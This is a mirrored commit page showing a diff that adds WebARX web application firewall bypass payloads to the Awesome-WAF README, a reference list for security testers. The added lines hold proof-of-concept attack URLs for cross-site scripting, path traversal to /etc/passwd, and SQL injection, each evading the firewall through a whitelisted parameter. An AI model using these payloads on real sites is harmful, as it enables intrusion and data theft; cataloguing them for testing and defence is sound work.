Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2024-10-01 04:35:35 -04:00
Code Issues Packages Projects Releases Wiki Activity

Update for more WebARX Bypasses

Browse Source
This commit is contained in:
Pinaki Mondal 2019-10-13 22:54:13 +05:30 committed by GitHub
commit 1d0dd372e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
README.md
View File

@ -3722,6 +3722,20 @@ http://host.com/test.asp?file=.%./bla.txt
```
<a69/onauxclick=open&#40&#41>rightclickhere
```
- [Bypassing All Protections Using A Whitelist String](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/) by [@Osanda Malith](https://twitter.com/OsandaMalith)
- XSS PoC
```
http://host.com/?vulnparam=<script>alert()</script>&ithemes-sync-request
```
- LFI PoC
```
http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request
```
- SQLi PoC
```
http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request
```
### WebKnight
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)